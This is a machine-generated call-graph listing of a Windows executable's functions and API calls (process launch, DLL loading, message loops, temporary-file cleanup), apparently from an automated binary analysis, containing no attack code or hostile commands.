7ff7f91ecd3c __scrt_release_startup_lock 9664 7ff7f91ecd48 9658->9664 9659->9658 9659->9660 9661 7ff7f91ecd91 9670 7ff7f91ed2e4 9661->9670 9663 7ff7f91ecd96 9673 7ff7f91e1000 9663->9673 9664->9661 9766 7ff7f91f9b9c 9664->9766 9667 7ff7f91ecdb2 9771 7ff7f91ed328 GetModuleHandleW 9667->9771 9669 7ff7f91ecdb9 9669->9660 9671 7ff7f920a540 9670->9671 9672 7ff7f91ed2fb GetStartupInfoW 9671->9672 9672->9663 9674 7ff7f91e1009 9673->9674 9780 7ff7f91f54f4 9674->9780 9676 7ff7f91e37fb 9784 7ff7f91e36b0 9676->9784 9678 7ff7f91e3804 9710 7ff7f91e3808 9678->9710 9799 7ff7f91e1950 9678->9799 9680 7ff7f91e3825 9681 7ff7f91e383c 9680->9681 9682 7ff7f91e391b 9680->9682 9683 7ff7f91e1c80 2 API calls 9681->9683 9684 7ff7f91e45b0 38 API calls 9682->9684 9686 7ff7f91e385b 9683->9686 9685 7ff7f91e392b 9684->9685 9685->9710 9837 7ff7f91e7f80 9685->9837 9686->9710 9818 7ff7f91e8a20 9686->9818 9689 7ff7f91e388e 9696 7ff7f91e38bb 9689->9696 9834 7ff7f91e8b90 9689->9834 9690 7ff7f91e395d 9691 7ff7f91e3984 9690->9691 9692 7ff7f91e3962 9690->9692 9694 7ff7f91e1c80 2 API calls 9691->9694 9693 7ff7f91f00bc 7 API calls 9692->9693 9693->9710 9697 7ff7f91e39a3 9694->9697 9698 7ff7f91e8a20 6 API calls 9696->9698 9704 7ff7f91e38de 9696->9704 9702 7ff7f91e1950 39 API calls 9697->9702 9698->9704 9700 7ff7f91e3a0b 9701 7ff7f91e8b90 2 API calls 9700->9701 9703 7ff7f91e3a17 9701->9703 9702->9686 9705 7ff7f91e8b90 2 API calls 9703->9705 9708 7ff7f91e390e 9704->9708 9846 7ff7f91e8b30 9704->9846 9706 7ff7f91e3a23 9705->9706 9707 7ff7f91e8b90 2 API calls 9706->9707 9707->9708 9709 7ff7f91e8a20 6 API calls 9708->9709 9711 7ff7f91e3a3b 9709->9711 9710->9667 9711->9710 9712 7ff7f91e8b30 2 API calls 9711->9712 9717 7ff7f91e3aab 9711->9717 9712->9717 9713 7ff7f91e8a20 6 API calls 9714 7ff7f91e3bf4 9713->9714 9715 7ff7f91e3c46 9714->9715 9716 7ff7f91e3d41 9714->9716 9719 7ff7f91e8a20 6 API calls 9715->9719 9729 7ff7f91e3c50 9715->9729 9851 7ff7f91e44d0 9716->9851 9717->9713 9721 7ff7f91e3ce0 9719->9721 9720 7ff7f91e3d4f 9722 7ff7f91e3d65 9720->9722 9723 7ff7f91e3d71 9720->9723 9721->9710 9726 7ff7f91e1c80 2 API calls 9721->9726 9854 7ff7f91e4620 9722->9854 9725 7ff7f91e1c80 2 API calls 9723->9725 9725->9729 9726->9729 9727 7ff7f91e3dc4 9728 7ff7f91e9400 2 API calls 9727->9728 9731 7ff7f91e3dd7 SetDllDirectoryW 9728->9731 9729->9710 9729->9727 9730 7ff7f91e3da7 SetDllDirectoryW LoadLibraryExW 9729->9730 9730->9727 9733 7ff7f91e3e0a 9731->9733 9760 7ff7f91e3e5a 9731->9760 9735 7ff7f91e8a20 6 API calls 9733->9735 9734 7ff7f91e3ffc 9737 7ff7f91e4006 PostMessageW GetMessageW 9734->9737 9738 7ff7f91e4029 9734->9738 9741 7ff7f91e3e16 9735->9741 9736 7ff7f91e3f1b 9882 7ff7f91e33c0 9736->9882 9737->9738 9827 7ff7f91e3360 9738->9827 9740 7ff7f91e3f23 9740->9710 9742 7ff7f91e3f2b 9740->9742 9744 7ff7f91e3ef2 9741->9744 9749 7ff7f91e3e4e 9741->9749 9746 7ff7f91e3f64 9742->9746 9747 7ff7f91e3f41 PostMessageW GetMessageW 9742->9747 9745 7ff7f91e8b30 2 API calls 9744->9745 9745->9760 9748 7ff7f91e8b30 2 API calls 9746->9748 9747->9746 9750 7ff7f91e3f77 9748->9750 9749->9760 9857 7ff7f91e7330 9749->9857 9890 7ff7f91e8bd0 9750->9890 9752 7ff7f91e4039 9754 7ff7f91e3f7f 9927 7ff7f91e8ad0 9754->9927 9757 7ff7f91e3e81 9758 7ff7f91e3e85 9757->9758 9868 7ff7f91e71a0 9757->9868 9758->9760 9873 7ff7f91e2a50 9758->9873 9760->9734 9760->9736 9761 7ff7f91e3fa5 9765 7ff7f91e3fcc 9761->9765 9933 7ff7f91e9200 9761->9933 9764 7ff7f91e2a50 7 API calls 9764->9765 9765->9710 9767 7ff7f91f9bd4 9766->9767 9768 7ff7f91f9bb3 9766->9768 10093 7ff7f91fa448 9767->10093 9768->9661 9772 7ff7f91ed339 9771->9772 9772->9669 9774 7ff7f91ed1c2 9773->9774 9775 7ff7f91ed1e1 RtlCaptureContext RtlLookupFunctionEntry 9774->9775 9776 7ff7f91ed246 9775->9776 9777 7ff7f91ed20a RtlVirtualUnwind 9775->9777 9778 7ff7f91ed278 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9776->9778 9777->9776 9779 7ff7f91ed2c6 9778->9779 9779->9656 9781 7ff7f91ff4f0 9780->9781 9783 7ff7f91ff543 9781->9783 9940 7ff7f91ff3c8 9781->9940 9783->9676 9785 7ff7f91ec8c0 9784->9785 9786 7ff7f91e36bc GetModuleFileNameW 9785->9786 9787 7ff7f91e3710 9786->9787 9788 7ff7f91e36eb GetLastError 9786->9788 9948 7ff7f91e92f0 FindFirstFileExW 9787->9948 9951 7ff7f91e2c50 9788->9951 9791 7ff7f91e371a 9792 7ff7f91e3723 9791->9792 9793 7ff7f91e377d 9791->9793 9961 7ff7f91e9370 CreateFileW 9792->9961 9964 7ff7f91e94b0 9793->9964 9796 7ff7f91e3734 9797 7ff7f91e3706 9796->9797 9797->9678 9798 7ff7f91e3730 9798->9793 9798->9796 9800 7ff7f91e45b0 38 API calls 9799->9800 9801 7ff7f91e1985 9800->9801 9802 7ff7f91e1c43 9801->9802 9803 7ff7f91e7f80 14 API calls 9801->9803 9802->9680 9804 7ff7f91e19cb 9803->9804 9805 7ff7f91f0744 4 API calls 9804->9805 9817 7ff7f91e19e9 9804->9817 9807 7ff7f91e19e5 9805->9807 9806 7ff7f91f00bc 7 API calls 9806->9802 9808 7ff7f91f040c _fread_nolock 14 API calls 9807->9808 9807->9817 9809 7ff7f91e1a20 9808->9809 9810 7ff7f91e1c80 2 API calls 9809->9810 9809->9817 9811 7ff7f91e1a92 9810->9811 9812 7ff7f91e1c80 2 API calls 9811->9812 9813 7ff7f91e1add 9812->9813 9814 7ff7f91f0744 4 API calls 9813->9814 9815 7ff7f91e1b01 9814->9815 9816 7ff7f91f040c _fread_nolock 14 API calls 9815->9816 9815->9817 9816->9817 9817->9806 9819 7ff7f91e8a2a 9818->9819 9820 7ff7f91e9400 2 API calls 9819->9820 9821 7ff7f91e8a49 GetEnvironmentVariableW 9820->9821 9822 7ff7f91e8a66 ExpandEnvironmentStringsW 9821->9822 9823 7ff7f91e8ab2 9821->9823 9822->9823 9824 7ff7f91e8a88 9822->9824 9823->9689 9825 7ff7f91e94b0 2 API calls 9824->9825 9826 7ff7f91e8a9a 9825->9826 9826->9689 9980 7ff7f91e6350 9827->9980 9829 7ff7f91e336e 9833 7ff7f91e338d 9829->9833 9998 7ff7f91e64f0 9829->9998 9831 7ff7f91e3381 9831->9833 10004 7ff7f91e6040 9831->10004 9833->9752 9835 7ff7f91e9400 2 API calls 9834->9835 9836 7ff7f91e8ba4 9835->9836 9836->9696 9838 7ff7f91e7fa4 9837->9838 9839 7ff7f91f0744 4 API calls 9838->9839 9844 7ff7f91e807b 9838->9844 9840 7ff7f91e7fc0 9839->9840 9840->9844 10028 7ff7f91f7938 9840->10028 9842 7ff7f91f0744 4 API calls 9845 7ff7f91e7fd5 9842->9845 9843 7ff7f91f040c _fread_nolock 14 API calls 9843->9845 9844->9690 9845->9842 9845->9843 9845->9844 9847 7ff7f91e9400 2 API calls 9846->9847 9848 7ff7f91e8b4c 9847->9848 9849 7ff7f91e9400 2 API calls 9848->9849 9850 7ff7f91e8b5c 9849->9850 9850->9700 9852 7ff7f91e1c80 2 API calls 9851->9852 9853 7ff7f91e44ed 9852->9853 9853->9720 9855 7ff7f91e1c80 2 API calls 9854->9855 9856 7ff7f91e4650 9855->9856 9856->9729 9858 7ff7f91e1470 39 API calls 9857->9858 9859 7ff7f91e7358 9858->9859 9860 7ff7f91e4620 2 API calls 9859->9860 9867 7ff7f91e73c3 9859->9867 9861 7ff7f91e737a 9860->9861 9862 7ff7f91e4620 2 API calls 9861->9862 9866 7ff7f91e737f 9861->9866 9864 7ff7f91e739e 9862->9864 9863 7ff7f91e2a50 7 API calls 9863->9867 9865 7ff7f91e4620 2 API calls 9864->9865 9864->9866 9865->9866 9866->9863 9866->9867 9867->9757 9869 7ff7f91e9070 3 API calls 9868->9869 9870 7ff7f91e71b9 9869->9870 9871 7ff7f91e9070 3 API calls 9870->9871 9872 7ff7f91e71cc 9871->9872 9872->9758 9874 7ff7f91ec8c0 9873->9874 9875 7ff7f91e2a74 GetCurrentProcessId 9874->9875 9876 7ff7f91e1c80 2 API calls 9875->9876 9877 7ff7f91e2ac7 9876->9877 9878 7ff7f91f49f4 2 API calls 9877->9878 9879 7ff7f91e2b0f 9878->9879 10039 7ff7f91e2620 9879->10039 9881 7ff7f91e2b31 9881->9760 9886 7ff7f91e33ce 9882->9886 9883 7ff7f91e35c7 9883->9740 9885 7ff7f91e1c80 2 API calls 9885->9886 9886->9883 9886->9885 9887 7ff7f91e4550 2 API calls 9886->9887 9888 7ff7f91e2a50 7 API calls 9886->9888 10046 7ff7f91e4180 9886->10046 10057 7ff7f91e4440 9886->10057 9887->9886 9888->9886 9891 7ff7f91e8bf0 9890->9891 9892 7ff7f91e9400 2 API calls 9891->9892 9893 7ff7f91e8c1d SetConsoleCtrlHandler GetStartupInfoW 9892->9893 9894 7ff7f91e8c6a _fread_nolock 9893->9894 9895 7ff7f91e8cc0 GetCommandLineW CreateProcessW 9894->9895 9896 7ff7f91e8d3d RegisterClassW 9895->9896 9897 7ff7f91e8d18 GetLastError 9895->9897 9899 7ff7f91e8d81 CreateWindowExW 9896->9899 9900 7ff7f91e8d7b GetLastError 9896->9900 9898 7ff7f91e2c50 5 API calls 9897->9898 9908 7ff7f91e8d33 9898->9908 9901 7ff7f91e8ddf ShowWindow 9899->9901 9902 7ff7f91e8dd7 GetLastError 9899->9902 9900->9899 9903 7ff7f91e8dea WaitForSingleObject 9901->9903 9902->9903 9904 7ff7f91e8dfc 9903->9904 9905 7ff7f91e8e78 9903->9905 9906 7ff7f91e8e81 WaitForSingleObject 9904->9906 9909 7ff7f91e8e05 GetLastError 9904->9909 9914 7ff7f91e8e14 PeekMessageW 9904->9914 9905->9906 9907 7ff7f91e8ec2 9905->9907 9910 7ff7f91e8e97 TerminateProcess 9906->9910 9911 7ff7f91e8fe8 9906->9911 9912 7ff7f91e8ecf QueryPerformanceFrequency QueryPerformanceCounter 9907->9912 9913 7ff7f91e8fb0 GetMessageW 9907->9913 9908->9754 9909->9904 9918 7ff7f91e8eaf WaitForSingleObject 9910->9918 9919 7ff7f91e8ea9 GetLastError 9910->9919 9916 7ff7f91e8ff4 DestroyWindow 9911->9916 9917 7ff7f91e9001 GetExitCodeProcess CloseHandle CloseHandle 9911->9917 9920 7ff7f91e8ef0 MsgWaitForMultipleObjects PeekMessageW 9912->9920 9915 7ff7f91e8fcb TranslateMessage DispatchMessageW 9913->9915 9926 7ff7f91e8f9b 9913->9926 9921 7ff7f91e8e66 WaitForSingleObject 9914->9921 9922 7ff7f91e8e33 TranslateMessage DispatchMessageW PeekMessageW 9914->9922 9915->9926 9916->9917 9917->9908 9918->9911 9919->9918 9923 7ff7f91e8f2a 9920->9923 9921->9904 9921->9905 9922->9921 9922->9922 9923->9913 9924 7ff7f91e8f6c QueryPerformanceCounter 9923->9924 9925 7ff7f91e8f30 TranslateMessage DispatchMessageW PeekMessageW 9923->9925 9924->9920 9924->9926 9925->9923 9925->9925 9926->9911 9926->9913 9928 7ff7f91e8ada 9927->9928 9929 7ff7f91e9400 2 API calls 9928->9929 9930 7ff7f91e8aff 9929->9930 10084 7ff7f91e83b0 9930->10084 9932 7ff7f91e8b09 9932->9761 9934 7ff7f91e9216 9933->9934 9935 7ff7f91e8ad0 8 API calls 9934->9935 9938 7ff7f91e9222 9934->9938 9935->9938 9936 7ff7f91e9230 Sleep 9937 7ff7f91e8ad0 8 API calls 9936->9937 9937->9938 9938->9936 9939 7ff7f91e3fb1 9938->9939 9939->9764 9939->9765 9947 7ff7f91f54dc EnterCriticalSection 9940->9947 9949 7ff7f91e932f FindClose 9948->9949 9950 7ff7f91e9342 9948->9950 9949->9950 9950->9791 9952 7ff7f91ec8c0 9951->9952 9953 7ff7f91e2c70 GetCurrentProcessId 9952->9953 9954 7ff7f91e2cb9 9953->9954 9969 7ff7f91f4c48 9954->9969 9956 7ff7f91e2d04 9957 7ff7f91e2d45 FormatMessageW 9956->9957 9958 7ff7f91e2d7f MessageBoxW 9957->9958 9959 7ff7f91e2d6d 9957->9959 9960 7ff7f91e2daf 9958->9960 9959->9958 9960->9797 9962 7ff7f91e93b0 GetFinalPathNameByHandleW CloseHandle 9961->9962 9963 7ff7f91e93d4 9961->9963 9962->9963 9963->9798 9965 7ff7f91e9505 9964->9965 9966 7ff7f91e94da WideCharToMultiByte 9964->9966 9967 7ff7f91e9522 WideCharToMultiByte 9965->9967 9968 7ff7f91e951b 9965->9968 9966->9965 9966->9968 9967->9968 9968->9797 9971 7ff7f91f4ca2 9969->9971 9970 7ff7f91f4de4 9972 7ff7f91fa9b8 __free_lconv_mon 2 API calls 9970->9972 9971->9970 9973 7ff7f91f4cc7 9971->9973 9974 7ff7f91f4db9 9971->9974 9975 7ff7f91f4e0a 9971->9975 9977 7ff7f91f4db0 9971->9977 9972->9973 9973->9956 9976 7ff7f91fa9b8 __free_lconv_mon 2 API calls 9974->9976 9975->9970 9978 7ff7f91f4e14 9975->9978 9976->9973 9977->9970 9977->9974 9979 7ff7f91fa9b8 __free_lconv_mon 2 API calls 9978->9979 9979->9973 9981 7ff7f91e6365 9980->9981 9982 7ff7f91e1c80 2 API calls 9981->9982 9983 7ff7f91e63a1 9982->9983 9984 7ff7f91e4620 2 API calls 9983->9984 9994 7ff7f91e63aa 9983->9994 9985 7ff7f91e63e5 9984->9985 10008 7ff7f91e4550 9985->10008 9987 7ff7f91e640d 9988 7ff7f91e641b 9987->9988 9989 7ff7f91e9070 3 API calls 9987->9989 9990 7ff7f91e4620 2 API calls 9988->9990 9989->9988 9991 7ff7f91e6434 9990->9991 9991->9994 10012 7ff7f91e9070 9991->10012 9993 7ff7f91e6466 9993->9994 9995 7ff7f91e9400 2 API calls 9993->9995 9994->9829 9996 7ff7f91e648a GetLastError 9995->9996 9997 7ff7f91e2c50 5 API calls 9996->9997 9997->9994 10000 7ff7f91e6516 9998->10000 9999 7ff7f91e651e 9999->9831 10000->9999 10016 7ff7f91f7320 10000->10016 10002 7ff7f91e6638 10003 7ff7f91f7320 5 API calls 10002->10003 10003->9999 10007 7ff7f91e6060 10004->10007 10005 7ff7f91e6089 10005->9833 10006 7ff7f91e1470 39 API calls 10006->10007 10007->10005 10007->10006 10009 7ff7f91e455a 10008->10009 10010 7ff7f91e9400 2 API calls 10009->10010 10011 7ff7f91e457f 10010->10011 10011->9987 10013 7ff7f91e9400 2 API calls 10012->10013 10014 7ff7f91e9084 LoadLibraryExW 10013->10014 10015 7ff7f91e90a3 10014->10015 10015->9993 10017 7ff7f91f7335 10016->10017 10018 7ff7f91f732e 10016->10018 10017->10018 10020 7ff7f91f7118 10017->10020 10018->10002 10027 7ff7f91f54dc EnterCriticalSection 10020->10027 10029 7ff7f91f7968 10028->10029 10032 7ff7f91f7444 10029->10032 10031 7ff7f91f7981 10031->9845 10033 7ff7f91f745f 10032->10033 10034 7ff7f91f748e 10032->10034 10033->10031 10038 7ff7f91f54dc EnterCriticalSection 10034->10038 10036 7ff7f91f7493 10037 7ff7f91f54e8 _fread_nolock LeaveCriticalSection 10036->10037 10037->10033 10040 7ff7f91e262f 10039->10040 10041 7ff7f91e9400 2 API calls 10040->10041 10042 7ff7f91e2660 10041->10042 10043 7ff7f91e2683 MessageBoxA 10042->10043 10044 7ff7f91e266f MessageBoxW 10042->10044 10045 7ff7f91e2690 10043->10045 10044->10045 10045->9881 10047 7ff7f91e4191 10046->10047 10048 7ff7f91e44d0 2 API calls 10047->10048 10049 7ff7f91e41cb 10048->10049 10050 7ff7f91e44d0 2 API calls 10049->10050 10051 7ff7f91e41db 10050->10051 10052 7ff7f91e4257 10051->10052 10054 7ff7f91e428c 10051->10054 10060 7ff7f91e7ce0 10052->10060 10055 7ff7f91e1950 39 API calls 10054->10055 10056 7ff7f91e4267 10054->10056 10055->10056 10056->9886 10058 7ff7f91e1c80 2 API calls 10057->10058 10059 7ff7f91e4464 10058->10059 10059->9886 10061 7ff7f91e7cf5 10060->10061 10062 7ff7f91e45b0 38 API calls 10061->10062 10063 7ff7f91e7d1b 10062->10063 10064 7ff7f91e45b0 38 API calls 10063->10064 10067 7ff7f91e7d42 10063->10067 10065 7ff7f91e7d32 10064->10065 10066 7ff7f91e7d3d 10065->10066 10076 7ff7f91e7d4c 10065->10076 10068 7ff7f91f00bc 7 API calls 10066->10068 10067->10056 10068->10067 10069 7ff7f91e7daf 10070 7ff7f91f00bc 7 API calls 10069->10070 10071 7ff7f91e7dd7 10070->10071 10073 7ff7f91f00bc 7 API calls 10071->10073 10072 7ff7f91f040c _fread_nolock 14 API calls 10072->10076 10073->10067 10074 7ff7f91e7db1 10074->10069 10077 7ff7f91f7388 10074->10077 10076->10069 10076->10072 10076->10074 10078 7ff7f91f7390 10077->10078 10081 7ff7f91f73ac _invalid_parameter_noinfo 10078->10081 10083 7ff7f91f54dc EnterCriticalSection 10078->10083 10081->10069 10085 7ff7f91e83ca 10084->10085 10086 7ff7f91e840a FindFirstFileW 10085->10086 10087 7ff7f91e84f3 10085->10087 10086->10087 10091 7ff7f91e842e 10086->10091 10087->9932 10088 7ff7f91e84c3 FindNextFileW 10089 7ff7f91e84d9 FindClose RemoveDirectoryW 10088->10089 10088->10091 10089->10087 10090 7ff7f91e84b5 DeleteFileW 10090->10088 10091->10088 10091->10090 10092 7ff7f91e8496 RemoveDirectoryW 10091->10092 10092->10088 10096 7ff7f91fb1c0 GetLastError 10093->10096 10095 7ff7f91fa451 10097 7ff7f91fb1e4 FlsGetValue 10096->10097 10098 7ff7f91fb201 FlsSetValue 10096->10098 10100 7ff7f91fb1fb 10097->10100 10111 7ff7f91fb1f1 10097->10111 10099 7ff7f91fb213 10098->10099 10098->10111 10113 7ff7f91fec08 10099->10113 10100->10098 10101 7ff7f91fb26d SetLastError 10103 7ff7f91fb27a 10101->10103 10103->10095 10104 7ff7f91fb222 10105 7ff7f91fb240 FlsSetValue 10104->10105 10106 7ff7f91fb230 FlsSetValue 10104->10106 10108 7ff7f91fb25e 10105->10108 10109 7ff7f91fb24c FlsSetValue 10105->10109 10107 7ff7f91fb239 10106->10107 10110 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10107->10110 10112 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10108->10112 10109->10107 10110->10111 10111->10101 10112->10101 10116 7ff7f91fec19 10113->10116 10114 7ff7f91fec4e HeapAlloc 10115 7ff7f91fec68 10114->10115 10114->10116 10115->10104 10116->10114 10116->10115 10944 7ff7f9209ca4 __GSHandlerCheckCommon 10945 7ff7f9209cf7 10944->10945 10546 7ff7f91fda28 10547 7ff7f91fda41 10546->10547 10548 7ff7f91fda54 10546->10548 10547->10548 10550 7ff7f9203374 10547->10550 10551 7ff7f91fb1c0 10 API calls 10550->10551 10552 7ff7f9203383 10551->10552 10556 7ff7f92033c9 10552->10556 10557 7ff7f9200348 EnterCriticalSection 10552->10557 10556->10548 10946 7ff7f91fcca8 10948 7ff7f91fccc4 10946->10948 10947 7ff7f91fcde9 10948->10947 10949 7ff7f91fcde1 GetLastError 10948->10949 10950 7ff7f91fcd9e WriteFile 10948->10950 10949->10947 10950->10948 10950->10949 10558 7ff7f91e2180 GetDC 10559 7ff7f91e224d 10558->10559 10560 7ff7f91e21bd 10558->10560 10563 7ff7f91e2252 MoveWindow MoveWindow MoveWindow MoveWindow 10559->10563 10561 7ff7f91e21ef SelectObject 10560->10561 10562 7ff7f91e21fb DrawTextW 10560->10562 10561->10562 10564 7ff7f91e2225 SelectObject 10562->10564 10565 7ff7f91e2231 ReleaseDC 10562->10565 10566 7ff7f91e2379 10563->10566 10564->10565 10565->10563 10951 7ff7f9200300 10952 7ff7f9200308 10951->10952 10953 7ff7f9200335 10952->10953 10955 7ff7f9200370 10952->10955 10956 7ff7f920039b 10955->10956 10957 7ff7f920039f 10956->10957 10958 7ff7f920037e DeleteCriticalSection 10956->10958 10957->10953 10958->10956 10567 7ff7f91f5480 10568 7ff7f91f548b 10567->10568 10575 7ff7f91ff314 10568->10575 10584 7ff7f9200348 EnterCriticalSection 10575->10584 10585 7ff7f91f927c 10586 7ff7f91f9295 10585->10586 10597 7ff7f91f9291 10585->10597 10598 7ff7f9202aac GetEnvironmentStringsW 10586->10598 10589 7ff7f91f92a2 10591 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10589->10591 10590 7ff7f91f92ae 10605 7ff7f91f93fc 10590->10605 10591->10597 10594 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10595 7ff7f91f92d5 10594->10595 10596 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10595->10596 10596->10597 10599 7ff7f91f929a 10598->10599 10600 7ff7f9202ad0 10598->10600 10599->10589 10599->10590 10601 7ff7f91fd66c _fread_nolock HeapAlloc 10600->10601 10603 7ff7f9202b07 10601->10603 10602 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10604 7ff7f9202b27 FreeEnvironmentStringsW 10602->10604 10603->10602 10604->10599 10606 7ff7f91f9424 10605->10606 10607 7ff7f91fec08 _fread_nolock HeapAlloc 10606->10607 10608 7ff7f91f945f 10607->10608 10610 7ff7f91f94e1 10608->10610 10613 7ff7f91fec08 _fread_nolock HeapAlloc 10608->10613 10614 7ff7f91f94d0 10608->10614 10615 7ff7f91f9504 10608->10615 10618 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10608->10618 10619 7ff7f91f9467 10608->10619 10609 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10611 7ff7f91f92b6 10609->10611 10612 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10610->10612 10611->10594 10612->10611 10613->10608 10616 7ff7f91fa9b8 __free_lconv_mon 2 API calls 10614->10616 10617 7ff7f91fa970 9 API calls 10615->10617 10616->10619 10620 7ff7f91f9516 10617->10620 10618->10608 10619->10609 10974 7ff7f91ff9fc 10975 7ff7f91ffbde 10974->10975 10976 7ff7f91ffa3e 10974->10976 10976->10975 10986 7ff7f9206204 10976->10986 10979 7ff7f91ffc1a 10981 7ff7f91fa970 9 API calls 10979->10981 10980 7ff7f91ffaf9 _get_daylight 10980->10979 10983 7ff7f91ffb0a _get_daylight 10980->10983 10982 7ff7f91ffc2e 10981->10982 10983->10979 10984 7ff7f91ffb1b 10983->10984 10984->10975 10991 7ff7f9206248 10984->10991 10987 7ff7f9206213 10986->10987 10988 7ff7f91ffadc _get_daylight 10986->10988 10996 7ff7f9200348 EnterCriticalSection 10987->10996 10988->10979 10988->10980 10997 7ff7f9200348 EnterCriticalSection 10991->10997 10998 7ff7f9202bfc 10999 7ff7f9202d00 10998->10999 11000 7ff7f9202c05 10998->11000 11001 7ff7f9202c1f 11000->11001 11002 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11000->11002 11003 7ff7f9202c31 11001->11003 11004 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11001->11004 11002->11001 11005 7ff7f9202c43 11003->11005 11007 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11003->11007 11004->11003 11006 7ff7f9202c55 11005->11006 11008 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11005->11008 11009 7ff7f9202c67 11006->11009 11010 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11006->11010 11007->11005 11008->11006 11011 7ff7f9202c79 11009->11011 11012 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11009->11012 11010->11009 11013 7ff7f9202c8b 11011->11013 11014 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11011->11014 11012->11011 11015 7ff7f9202c9d 11013->11015 11016 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11013->11016 11014->11013 11017 7ff7f9202caf 11015->11017 11018 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11015->11018 11016->11015 11019 7ff7f9202cc1 11017->11019 11020 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11017->11020 11018->11017 11021 7ff7f9202cd6 11019->11021 11022 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11019->11022 11020->11019 11023 7ff7f9202ceb 11021->11023 11024 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11021->11024 11022->11021 11023->10999 11025 7ff7f91fa9b8 __free_lconv_mon 2 API calls 11023->11025 11024->11023 11025->10999 10621 7ff7f91f6c7c 10623 7ff7f91f6caf 10621->10623 10622 7ff7f91f6cb4 10623->10622 10624 7ff7f91f6d98 GetLastError 10623->10624 10624->10622 10625 7ff7f9209494 10626 7ff7f92094d4 10625->10626 10627 7ff7f9209517 _raise_exc 10626->10627 10628 7ff7f9209540 10626->10628 10627->10628 11026 7ff7f91ef2f8 11027 7ff7f91ef325 __except_validate_context_record 11026->11027 11028 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11027->11028 11029 7ff7f91ef32a 11028->11029 11030 7ff7f91ef384 11029->11030 11031 7ff7f91ef412 11029->11031 11038 7ff7f91ef3a6 11029->11038 11033 7ff7f91ef3ff __FrameHandler3::FrameUnwindToEmptyState 11030->11033 11030->11038 11032 7ff7f91ef431 11031->11032 11039 7ff7f91ee4f8 11031->11039 11037 7ff7f91ef480 11032->11037 11032->11038 11042 7ff7f91ee50c 11032->11042 11033->11038 11037->11038 11045 7ff7f91eea78 11037->11045 11040 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11039->11040 11041 7ff7f91ee501 11040->11041 11041->11032 11043 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11042->11043 11044 7ff7f91ee515 11043->11044 11044->11037 11094 7ff7f91efa2c 11045->11094 11047 7ff7f91eee8f 11049 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11047->11049 11054 7ff7f91eeed3 11047->11054 11049->11054 11050 7ff7f91eedc1 11050->11047 11053 7ff7f91eedde 11050->11053 11055 7ff7f91ee4f8 Is_bad_exception_allowed 2 API calls 11050->11055 11051 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11052 7ff7f91eeb26 11051->11052 11052->11054 11057 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11052->11057 11053->11047 11056 7ff7f91eedf5 __FrameHandler3::ExecutionInCatch 11053->11056 11058 7ff7f91eee08 11053->11058 11054->11038 11055->11053 11056->11047 11056->11058 11059 7ff7f91eeb36 11057->11059 11060 7ff7f91eee16 11058->11060 11092 7ff7f91eef23 11058->11092 11061 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11059->11061 11063 7ff7f91eee21 11060->11063 11065 7ff7f91ee4f8 Is_bad_exception_allowed 2 API calls 11060->11065 11071 7ff7f91eeb3f 11061->11071 11062 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11064 7ff7f91eef29 11062->11064 11067 7ff7f91efac4 2 API calls 11063->11067 11066 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11064->11066 11065->11063 11069 7ff7f91eef32 11066->11069 11068 7ff7f91eee37 11067->11068 11068->11047 11134 7ff7f91ee160 11068->11134 11073 7ff7f91fa448 10 API calls 11069->11073 11070 7ff7f91eebbf 11070->11047 11070->11050 11074 7ff7f91ee50c GetLastError SetLastError 11070->11074 11113 7ff7f91ef1b8 11070->11113 11127 7ff7f91ee9a4 11070->11127 11071->11054 11072 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11071->11072 11076 7ff7f91eeb81 11072->11076 11073->11054 11074->11070 11076->11070 11079 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11076->11079 11080 7ff7f91eeb8d 11079->11080 11081 7ff7f91edb70 __CxxCallCatchBlock 2 API calls 11080->11081 11083 7ff7f91eeb96 11081->11083 11102 7ff7f91efac4 11083->11102 11087 7ff7f91eebaa 11109 7ff7f91efbb4 11087->11109 11089 7ff7f91eef1d 11090 7ff7f91fa448 10 API calls 11089->11090 11090->11092 11091 7ff7f91eebb2 __CxxCallCatchBlock 11091->11089 11093 7ff7f91eef04 std::bad_alloc::bad_alloc 11091->11093 11092->11062 11093->11089 11095 7ff7f91efa51 11094->11095 11096 7ff7f91ee160 __FrameHandler3::GetHandlerSearchState RtlLookupFunctionEntry 11095->11096 11097 7ff7f91efa66 __GetUnwindTryBlock 11096->11097 11098 7ff7f91efa9b __GetUnwindTryBlock 11097->11098 11099 7ff7f91efa78 __FrameHandler3::GetHandlerSearchState 11097->11099 11100 7ff7f91eeada 11098->11100 11140 7ff7f91ee638 11099->11140 11100->11051 11100->11054 11100->11070 11104 7ff7f91efbab 11102->11104 11107 7ff7f91efaef 11102->11107 11103 7ff7f91eeba6 11103->11070 11103->11087 11105 7ff7f91ee50c GetLastError SetLastError 11105->11107 11106 7ff7f91ee4f8 Is_bad_exception_allowed 2 API calls 11106->11107 11107->11103 11107->11105 11107->11106 11108 7ff7f91ef1b8 2 API calls 